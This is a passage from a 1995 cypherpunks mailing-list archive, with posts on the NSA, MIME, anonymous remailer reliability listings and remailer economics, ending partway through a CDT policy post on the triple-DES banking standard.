Comment: Gratis auto-signing service

iQBFAwUBLz8VwyoZzwIn1bdtAQHQDgGAgURmCoUB4Hop6nPRayXkK//DJ6muBORK
H8Vs6rEiDuYEezGPOT0oIxM4J1aJMuwa
=t78D
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david.lloyd-jones@canrem.com (David Lloyd-Jones)
Date: Mon, 13 Feb 95 20:04:16 PST
To: cypherpunks@toad.com
Subject: The NSA (Was Re: Factorin
In-Reply-To: <9502130231.AA19651@snark.imsi.com>
Message-ID: <60.20378.6525.0C1CFB64@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain


 "Perry E. Metzger" <perry@imsi.com> writes:
 
PM+The black community also has lots of day-to-day experience that we
  +don't have, and they understand both the threat model and the
  +practical side of things a lot better than we do.
 
Perry,
 
I don't see too much reason to suppose that this is true.  The CIA
has had almost everything wrong since 1960, and it routinely becomes 
clear a few weeks after the fact that smart bombs, air breathing 
missiles, SCUD hunts and the like are an almost total waste of good 
silicon.
 
When the Russians first landed stuff on the Moon it was semi-amateurs 
in England, not the vaunted NASA folks, who were tuned in. 
 
My guess would be that the folks at NSA spend most of their time 
worrying about getting a better parking spot, the same as everybody 
else in Washington.
 
PM+Overall, I'd say that in the long run the open community is going to
  +catch up regardless of what the NSA likes. That does not mean,
  +however, that this is going to happen particularly soon, or that they
  +don't still know decades more than we do.
 
I think you're right about the superiority of the open community, but 
it may not be out there in the future.  It may be accompli.
 
                                   -dlj.

david.lloyd-jones@canrem.com

 * 1st 1.11 #3818 *       Gingrich, n. abbrev. :  "Giving to the rich".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Mon, 13 Feb 95 03:26:23 PST
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <17765.792621125.1@nsb.fv.com>
Message-ID: <ojDo69v0Eyt50xSXkP@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 12-Feb-95 Re: MIME based remailing co.. Rick
Busdiecker@lehman.c (1544)

>     Well, I have no idea why you think that MIME is an "atrocity" or
>     "slime", but it is perfectly clear that you have no idea what it
>     actually *is*, since "X-" headers have nothing whatsoever to do with
>     MIME.  The "X-" headers are defined by RFC 822, which has been the
>     standard for Internet mail formats since 1982.

> You base a large conclusion on a small piece of data in combination
> with some poor duduction.  Unless you are claiming that MIME violates
> RFC 822 with respect to the handling of X- headers you have made a
> number of false claims in the paragraph above.

A very interesting claim.  Care to tell me what my "false claims" are,
or is it a secret?

> It is possible for someone to find
> ugliness where you find beauty without them necessarily being
> uninformed.

Of course.  Let me tell you, though, what the real "beauty" of MIME is: 
It is that Internet mail was upgraded from ASCII-text-only to permit
multiple character sets, images, audio, video, and arbitrary extensions,
WITHOUT breaking any existing standards or software.  It is that
multimedia mail was defined in such a way that it can cross existing
ASCII-to-EBCDIC gateways and all manner of other bizarre mail-eating
paths and still be complete and comprehensible on the other end.  That's
the kind of "beauty" we were aiming at, so if your comments are geared
to any specific technical aspects of MIME, this may be the explanation. 
We considered practical functioning and interoperation to be the
operational definition of "beauty".  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 13 Feb 95 06:30:54 PST
To: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Subject: Re: UMich student arrested for rape story
In-Reply-To: <199502130721.XAA24596@igc3.igc.apc.org>
Message-ID: <Pine.3.89.9502130650.A28579-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 12 Feb 1995, Richard F. Dutcher wrote:
 
> In any case, this is hardly cyrpto-related.  I would far rather lurk 
> as the mathematicians discuss factoring.  I learn more [even if I 
> only get one word in three :-]

I am sick to the back teeth of people writing "This is not cryto related,
so I should be allowed to have last word."

This is irritating, offensive, and hypocritical.

In addition the claims you make are entirely false, but I wont rebut
them because you have wandered considerably further from crypto and
privacy than did the post that you are replying to.

> 
> "That's libertarians for you - anarchists who want police protection from their slaves."
>                           Kim Stanley Robinson, "Green Mars"

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 13 Feb 95 04:38:53 PST
To: lile@art.net (Lile Elam)
Subject: Re: bill alert...
In-Reply-To: <199502130515.VAA14482@art.net>
Message-ID: <199502131235.GAA02452@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> Do you think this will force folks into using encryption?
> If I was a sysop, I sure would have all my users using
> encryption... :)
> 
> -lile
> 
> 
Then you would have no users. Users resent being made to do anything they
don't want to do. If they decide it is worth it they will do it, otherwise
they go elsewhere.

Take care.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 13 Feb 95 06:49:51 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199502131450.GAA17137@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@204.95.228.28

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"myriad"} = "<remailer@myriad.pc.cc.cmu.edu> cpunk pgp hash latent cut ek";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk pgp hash latent cut ek ksub";
$remailer{"q"} = "<q@c2.org> cpunk pgp hash latent cut ek ksub";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp";
$remailer{"tower"} = "<remailer@tower.techwood.org> cpunk pgp";
$remailer{"eniac"} = "<vanklava@eniac.ac.siue.edu> cpunk pgp hash latent cut ek";
$remailer{"charon"} = "<charon@styx.jpunix.com> cpunk hash latent cut ek";
$remailer{"bonafide"} = "<remailer@bonafide.jpunix.com> cpunk hash latent cut ek";
$remailer{"ford"} = "<ford@prefect.jpunix.com> cpunk hash latent cut ek";
$remailer{"aegis"} = "<aegis@athena.jpunix.com> cpunk";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.

JPUNIX.COM offers a domain hiding service for remailers. Send email to 
perry@jpunix.com for more information. NOTE: JPUNIX.COM itself does not 
run a remailer. All subdomains of jpunix.com on this list are remailers 
that are not physically located on jpunix.com

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Last ping: Mon 13 Feb 95 6:00:02 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
tower    remailer@tower.techwood.org      *****#*#****     4:34  99.97%
mix      mixmaster@nately.ucsd.edu        ++++++++++++    36:13  99.96%
nately   remailer@nately.ucsd.edu         ++++++++-+++    33:48  99.96%
penet    anon@anon.penet.fi               +++-+++++---  3:28:32  99.99%
rahul    homer@rahul.net                  *#-*+**-***     13:52  99.97%
xs4all   remailer@xs4all.nl               +**+*+++****    11:02  99.94%
bonafide remailer@bonafide.jpunix.com     ##********.-  1:06:02  99.92%
myriad   remailer@myriad.pc.cc.cmu.edu    **********.-  1:07:06  99.84%
vox      remail@vox.xs4all.nl             ..---...--.  23:29:37  99.90%
alumni   hal@alumni.caltech.edu           *##* *+*****     6:35  99.62%
portal   hfinney@shell.portal.com         *##* *+#**#*     4:16  99.62%
c2       remail@c2.org                    ++-+++++++++    42:42  99.49%
q        q@c2.org                         ++-+++++++.+  1:09:16  99.45%
flame    tomaz@flame.sinet.org            **********.-  1:18:51  99.38%
usura    usura@replay.com                 *+ *** *****     8:21  99.22%
ford     ford@prefect.jpunix.com          ++-++++ ++.-  1:46:37  99.21%
bsu-cs   nowhere@bsu-cs.bsu.edu           --**--#*****    27:38  99.18%
soda     remailer@csua.berkeley.edu       ....._. .-.   9:40:51  98.93%
ideath   remailer@ideath.goldenbear.com   --- ------.-  2:40:41  98.55%
charon   charon@styx.jpunix.com           ++-*__****.-  3:38:09  98.24%
syrinx   syrinx@c2.org                    ++-*__******  2:39:40  97.78%
aegis    aegis@athena.jpunix.com              _ -+**.-  4:06:48  96.99%
eniac    vanklava@eniac.ac.siue.edu       +#****    *      5:31  52.27%
rebma    remailer@rebma.mn.org            -     *--    14:20:54  45.33%
desert   remail@desert.xs4all.nl          -_.-_..-     33:07:32  42.87%
extropia remail@extropia.wimsey.com                     5:04:09   1.17%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in relpy blocks using Encrypt-Key:
          header.


Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burrell <jburrell@crl.com>
Date: Mon, 13 Feb 95 04:56:41 PST
To: cypherpunks@toad.com
Subject: Archives?
In-Reply-To: <199502130723.CAA15970@ducie.cs.umass.edu>
Message-ID: <199502131255.GAA00423@crl.com>
MIME-Version: 1.0
Content-Type: text


> BTW, with an eye to avoiding rehashes of old flamewars, this does *not*
> constitute an invitation to scour the subscriber list for *.gov and *.mil and
> announce the results. Consult the archives if in doubt on this point.

Where are these archives? I haven't seen them.

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 13 Feb 95 05:23:43 PST
To: cactus@seabsd.hks.net (A Loose Affiliation of Millionaires and   Billionaires and Babies)
Subject: Re: standards...
In-Reply-To: <199502130818.DAA25598@bb.hks.net>
Message-ID: <9502131323.AA20121@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



A Loose Affiliation of Millionaires and Billionaires and Babies says:
> >  I.  Public key encryption.
> >      C.  Not limited to one public encryption scheme.
> 
> AFAIK, RSA is the only feasible PK scheme available.  There's eliptic
> curves, of course, but that's patented.

There are plenty of others, like Rabin's scheme, that are quite
practical, but just not used because they are all collectively
patented. After that patent expires in '97 things may change.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Mon, 13 Feb 95 08:34:28 PST
To: cypherpunks@toad.com
Subject: Re: bill alert...
In-Reply-To: <199502131235.GAA02452@einstein.ssz.com>
Message-ID: <950213.082427.4B5.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, root@einstein.ssz.com writes, quoting lile:

>> Do you think this will force folks into using encryption?
>> If I was a sysop, I sure would have all my users using
>> encryption... :)

> Then you would have no users. Users resent being made to do anything they
> don't want to do. If they decide it is worth it they will do it, otherwise
> they go elsewhere.

Some will leave.  Some (one might argue the ones with any basic
intelligence) will stay.  Sure, many users resent being herded.  But the
ones that stick around will be of a higher calibre.

Think of it as evolution in action.
- -- 
Roy M. Silvernail, writing from roy@cybrspc.mn.org
"Ah, man.. you hit the nails right on the heads there.  However, I think
you drove them right into your own forehead."
        -- datsun@wasteland.spam.org (Datsun Q. Wanderer)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLz9u7Rvikii9febJAQFpSwQAta5dfzEET3pmNJYwIGZ2/xH25byGgww7
JB0q/eS/C3WOJQZiygNfqcbkAeY7g5F+1fMHzhKC3CVLLDqlQCSnwFZahEHrjwdO
Z4q+flHeRo7dmPOWsUATdjk/S44BA11SwhgTZeMXJx0HvhRoimMjl06WCkqRmXZl
vbx5SGes33s=
=3pzO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 13 Feb 95 05:42:43 PST
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: The NSA (Was Re: Factoring - State of the Art and Predictions )
Message-ID: <v01510102ab64cd4dbfed@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:09 AM 2/13/95, Black Unicorn wrote:
>There is a internet lore that says the more valuable and insightful a
>given article is, the less response it gets.
>
>I hope this is right, as most of mine tend to be ignored.

On the other hand, they also get forwarded to people not on the list who
may be interested, which helps.  Bruce's went to 3 or 4 mathematically
aware people I know. The work of Mssrs 'corn, Froomkin, Hughes, Finney,
May, et.al. get re-zinged all over the place by yours truly.

Some of us don't have the chops to comment on the <mostly> excellent
content of this list. We still appreciate the work.

Thanks to all of you.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syshtg@gsusgi2.gsu.edu (Tom Gillman)
Date: Mon, 13 Feb 95 06:51:10 PST
To: jamesd@netcom.com (James A. Donald)
Subject: Re: UMich student arrested for rape story
In-Reply-To: <Pine.3.89.9502130650.A28579-0100000@netcom9>
Message-ID: <9502131450.AA26342@gsusgi2.gsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 Feb 1995, James A. Donald wrote:
> 
> On Sun, 12 Feb 1995, Richard F. Dutcher wrote:
> > In any case, this is hardly cyrpto-related.  I would far rather lurk 
> > as the mathematicians discuss factoring.  I learn more [even if I 
> > only get one word in three :-]
> 
> I am sick to the back teeth of people writing "This is not cryto related,
> so I should be allowed to have last word."
> 
> This is irritating, offensive, and hypocritical.
> 
> In addition the claims you make are entirely false, but I wont rebut
> them because you have wandered considerably further from crypto and
> privacy than did the post that you are replying to.
> 

And besides, you wanted the last word...

-- 
 Tom Gillman, Unix/AIX Systems Weenie  |"For a privacy advocate to determine
 Wells Computer Center-Ga. State Univ. |the best way to do key escrow is like
 (404) 651-4503 syshtg@gsusgi2.gsu.edu |a death penalty opponent choosing
 My opinions, not GSU's...             |between gas or electricity"-D.Banisar



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: News auto-reply daemon <news@lucy.ee.und.ac.za>
Date: Mon, 13 Feb 95 00:59:18 PST
To: cypherpunks@toad.com
Subject: Automatic reply to your test message   (lwall)
In-Reply-To: <PINE4545-dhfsdkjc@ack.berkeley.edu>
Message-ID: <9502130858.AA27833@lucy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3926.1071713480.multipart/mixed"

--Boundary..3926.1071713480.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

This is an automatic reply, to let you know that a test message from you
(or listing your address in the Reply-To header) recently arrived here
at news system "ee.und.ac.za", which is in the Electronic Engineering
department at the University of Natal, Durban, South Africa.

A lot of people are confused by automatic reply messages, so this
message tries quite hard to explain what is going on.  If you have any
good suggestions for ways in which the wording of this message can be
improved, please send them to <news@ee.und.ac.za>.

Some of the reasons people post test messages is to check whether their
news system is correctly configured to let their messages get out, and
to check whether their mail system is correctly configured to let mail
get back to them.  Because of these uses of test messages, some news
administrators -- trying to be helpful -- configure their news systems
to send automatic responses.

It is possible that somebody tricked you into posting a test message, or
that somebody else forged a test message that either appeared to be from
you or directed replies to you.  If that is what happened to you, then
you may be able to use the information below to help you to track down
the perpetrator.

Each message in almost all of the *.test newsgroups is a considered
as a candidate for an automatic reply like this one.  If the message
header or the first few lines of the body contains any of the phrases
"ignore", "no reply", "do not reply" or a few other variants, then
the message is ignored.  If the message does not contain any of those
trigger phrases, then the auto-replier sends back a reply like this
one.  (If you get more than one copy of this reply, that might mean
that there is a problem in the mail system; please ask your local mail
administrator for help.)

It's too late to have any effect on this message, because this reply
has already been sent, but in future, if you do not want to receive
automatic replies like this, then you should either refrain from posting
messages to the *.test newsgroups, or ensure that your postings to the
*.test newsgroups contain the trigger phrases that will cause your
messages to be ignored by auto-repliers.  Please also note that name
has not been added to any kind of subscription list, so there's no need
to try to unsubscribe or to send "ignore" messages back via electronic
mail.

By the way, this site receives messages in certain newsgroups, or with
certain distributions, that some people might consider to be unusual for
a site in South Africa.  We do that deliberately, so please don't be too
surprised.

If you want to write to the human who administers the news system that
generated this auto-reply message, the address <news@ee.und.ac.za>
should work.


--Boundary..3926.1071713480.multipart/mixed
Content-Type: application/octet-stream; name="bin00001.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00001.bin"
Content-Description: "A copy of the header and the first few lines of   the body of your test message."

UGF0aDogZWUudW5kLmFjLnphIXVjdGhweCF0aWNzYS5jb20hcHNncmFpbiFu
bnRwLnNraS5tc2tjYy5vcmchcHNpbm50cCFwc2lubnRwIXBzaW5udHAhcmVi
ZWNjYSFwYXVsaW5nLndhZHN3b3J0aC5vcmchZW1pLmNvbSF1dW5ldCFuZXdz
Lm1hdGh3b3Jrcy5jb20hem9tYmllLm5jc2MubWlsIW5ld3MuZHVrZS5lZHUh
Z29kb3QuY2MuZHVxLmVkdSFodWRzb24ubG0uY29tIW5ld3MucG9wLnBzdS5l
ZHUhbmV3cy5jYWMucHN1LmVkdSFob3dsYW5kLnJlc3Rvbi5hbnMubmV0IWFn
YXRlIW92ZXJsb2FkLmxibC5nb3YhZW1mLmVtZi5uZXQhaGlsYmVydC5kbmFp
LmNvbSFuYm4hbWl3b2shbmV3cy56ZWl0Z2Vpc3QubmV0IWFjay5iZXJrZWxl
eS5lZHUhbm90LWZvci1tYWlsClN1YmplY3Q6IGx3YWxsCk1lc3NhZ2UtSUQ6
IDxQSU5FNDU0NS1kaGZzZGtqY0BhY2suYmVya2VsZXkuZWR1PgpOTlRQLVBv
c3RpbmctSG9zdDogYWNrLmJlcmtlbGV5LmVkdQpPcmdhbml6YXRpb246IGN5
cGhlcnB1bmtzCkxpbmVzOiAyCkZyb206IGN5cGhlcnB1bmtzQHRvYWQuY29t
CkRpc3RyaWJ1dGlvbjogd29ybGQKTmV3c2dyb3VwczogYWx0LnRlc3QKRGF0
ZTogNiBGZWIgMTk5NSAxOTozNDoxOSBHTVQKCnRlc3QKdGVzdAo=
--Boundary..3926.1071713480.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Mon, 13 Feb 95 11:12:24 PST
To: cypherpunks@toad.com
Subject: RE: Is Cyberspace Rich Enough?
Message-ID: <9502131912.AA24488@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Timothy C. May

"(Actually, cyberspace is partly getting "bigger" and partly
"increasing in dimensionality." Dimensionality of a space can be
related to how many neighbors one has....think of the two nearest
neighbors one has in a 1-D space, the 4 (or 8 if diagonals are
considered) neighbors in a 2-D space, the 6 in a 3-D space, and so on.
Arguably, if one has "100 close neighbors" in a space, it is roughly a
50 dimensional space. An equivalent formulation is in terms of the
radius of the n-sphere that everyone fits into. For example, the "six
degrees of separation," the 6 "handshakes" that separate nearly any
two people in America, suggests that American society is in some
important sense roughly a 15-17 dimensional space, because in some
sense all 250 million Americans "fit into" a hypersphere of radius 3
(diameter 6) when the dimensionality is around 17. (Or slightly lower,
as the slight corrections to V = r ^ n have to be included, which I'm
not bothering with). What "increased connectivity" does is to increase
dimensionality, about as one would expect from our usual metaphors
about "a multidimensional society" and "the world is
shrinking"...indeed it is shrinking, even as the absolute volume
increases.)"

         Well, what I want to know about this, is:
          what are the symmetries involved in the product?

          (I learned that question this weekend)


"What Cypherpunks should be pushing for, in my view, is this increased
dimensionality. More places to stick things, more places to escape
central control, and more degrees of freedom (which has a nice dual
meaning I once used as the working title for a novel I was working
on)."

I think that this proliferation of places will increase as people find 
immediate, practical or entertaining uses for home pages and places to 
stash info, before they will seek to find places to hide, to evade 
detection, to escape notice, or to blend into the milieu as the aim of 
their cyberspatial activity.

And shouldn't there be some mention of the "hardware" involved in 
making cyberspace possible?  Wouldn't there some requirement for more 
cables underground to places which don't yet have them, and utility 
companies to manage the flow of electricity, etc?   I don't know a 
great deal about these things, but it's hardly ever mentioned here, as 
though electricity just flows by itself somewhere called 'cyberspace' 
and all one ever has to think about (besides crypto and software 
commands) are how to plug oneself in, like 3C-PO.    But somebody has 
to install the plugs in, first.

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Mon, 13 Feb 95 11:10:02 PST
To: cypherpunks@toad.com
Subject: Re: Is Cyberspace Rich Enough?
Message-ID: <199502131909.AA13622@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> [deleted]

> But can we do more? One of my own wishes is to see hundreds (nay,
> thousands!) of remailers, as these act as "teleportation booths" which
> can dramatically increase connectivity. (They can increase the
> connectivity in a different way that just straight connections
> can...they "stitch together" otherwise visibly-connected regions with
> unobservable connections, a desirable thing.)

I'm not sure that thousands of remailers will ever exist.  There will 
be little incentive for people to use small remailers, which, because 
of their low traffic, add little untracibility per additional unit of 
latency and monetary costs compared to larger remailers.  Larger 
remailers will also likely have better reputations for 
trustworthiness.  The economics seem to indicate that (if a market 
of remailers is ever established) there will be a small number (less than 
a hundred) of large remailers that are well used and profitable, and 
a larger number of small remailers that are nearly never used.

> [deleted]
 
> * Web access remailers. Like the "anonymous anonymous ftp," why not
> explore combining Web systems with remailers? (Not so great for
> browsing, of course, but there should be some interesting
> possibilities.)

Remailers don't seem to be a good way to access the WWW, which is 
much more efficient when done interactively.  On the other hand, my 
proposed Pipe-net would seem to be perfect for this, and other 
communications that need both untracibility and low latency.

Wei Dai

P.S. People are more likely to respond to things they don't agree 
with (as I did here).  If you write something and no one responds, 
it probably means that everyone except the lurkers agree with you, so 
take it as a good sign.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLz+uDzl0sXKgdnV5AQFvkwP/XiKF5kYexZUje14rk2iyxlLpLke8EHCY
BbRMFQZFQPk0KFo/8iThSn1Xs0xgHrjud5hmpoBxkR+pKMTPfNx6rbTFoSF3HQtX
VzNacOYflcb/eSjHDS02IhMH5wYeUpmKzBE+K4ZgZ35i7sdx8yoHb8laYp1Trhq5
iQ4fbWNy+UA=
=DiM1
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gnu
Date: Mon, 13 Feb 95 12:43:06 PST
To: cypherpunks@toad.com
Subject: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
Message-ID: <9502132043.AA17858@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


------------------------------------------------------------------------
   ******    ********    *************
  ********   *********   *************   
  **         **      **       ***               POLICY POST  
  **         **      **       ***               
  **         **      **       ***               February 13, 1995
  **         **      **       ***               Number 2
  ********    *********       ***              
   ******    ********         ***
                
  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST 2/13/95                                     Number 2

CONTENTS: (1) X9 Committee Agrees to Develop 3x DES Encryption Standard
          (2) About the Center for Democracy and Technology

This document may be re-distributed freely providing it remains in its 
entirety.
------------------------------------------------------------------------

X9 COMMITTEE AGREES TO DEVELOP 3x DES ENCRYPTION STANDARD 

Major Setback for NSA

The NSA's efforts to push the adoption the Clipper/Skipjack 
government-escrowed encryption scheme encountered a major 
setback earlier this month with the decision by the 
Accredited Standards Committee X9 to proceed with the 
development of a data security standard based on triple-DES.    

The ASC X9 committee is responsible for setting data security 
standards for the US banking and financial services 
industries.   These industries are heavy users of commercial 
cryptography, and standards developed for this community tend 
to drive the development of applications for the entire 
market.  As a result, the committee's decision to proceed 
with a triple-DES standard has important implications for 
future cryptographic standards and US cryptography policy 
generally.

The NSA, a voting member of the X9 committee, had lobbied 
hard against the proposal.  In a November letter to committee 
members, the NSA threatened to prevent the export of triple-
DES, citing existing US law and potential threats to national 
security (see attached NSA letter).

The decision sets the stage for the development of a next 
generation of security standards based on publicly available, 
non-escrowed encryption schemes.   A battle over the 
exportability of triple-DES applications is also on the 
horizon.

Through export controls on cryptography, the proposed Clipper 
initiative, and interference in the standards setting 
processes, US government policies have consistently sought to 
make strong encryption and other privacy protecting 
technologies unavailable to the general public.  The X9 
decision and development of triple-DES and other alternitives 
to government-escrowed cryptography is an important victory 
in that it will increase the public's access to strong, 
privacy enhancing technologies.

BACKGROUND

Banks and other financial institutions use encryption to 
protect the billions of dollars in transactions and fund 
transfers which flow every day across the world's 
communications networks.  

The current encryption standard used by the banking industry 
is based on DES, which has been available since the early 
1970's.  DES is widely trusted because it has been repeatedly 
tested and is considered by experts to be unbreakable except 
by brute force (trying every possible key combination).  The 
US government has also allowed the limited export of DES.

Despite its popularity, DES is considered to be reaching the 
end of its useful life.   The increasing speed and 
sophistication of computer processing power has begun to 
render DES vulnerable to brute force attacks.  Cryptographers 
have recently demonstrated that DES codes can be cracked in 
as little as three hours with $1 million worth of currently 
available equipment.  As a result, the banking and financial 
services industries have begun to explore alternatives to 
DES.  

Although there are many potential alternatives to DES, 
triple-DES is widely seen as the most practical solution.  
Triple-DES is based on DES, but has been enhanced by 
increasing the key length and by encrypting through multiple 
iterations.   These enhancements make triple-DES less 
vulnerable to brute force attacks.  Triple-DES is also 
popular because it can be easily incorporated into existing 
DES systems and is based on standards and procedures familiar 
to most users.   

NSA SETBACK IS A VICTORY FOR CLIPPER OPPONENTS

In their November letter to X9 committee members, the NSA 
attempted to undermine the attractiveness of triple-DES by 
arguing that it is cryptographically unsound, a potential 
threat to national security, and would not be exportable 
under US law.   The NSA, while offering no specific 
alternative to triple-DES, seemed to be attempting to push 
the committee to adopt the only currently available option -- 
Clipper.

Privacy advocates also lobbied the X9 committee.  In a letter 
sent in advance of the December 1994 ballot, CDT Deputy 
Director Daniel Weitzner (then EFF Deputy Policy Director) 
and EFF board member John Gilmore, an expert in this field, 
sent a letter to X9 committee members urging them to adopt 
the triple-DES standard. A copy of the letter is appended at 
the end of this post.

By agreeing to develop a triple-DES standard, the X9 
committee has clearly and decisively rejected Clipper as a 
solution. This vote thus represents a further repudiation to 
Clipper and yet another victory for opponents of government 
efforts to establish Clipper or other government-escrowed 
solutions as a national standard.

NEXT STEPS

X9F, a subcommittee of the X9 committee, will now develop 
technical standards for implementing triple-DES based 
applications.  This process is expected to take one or two 
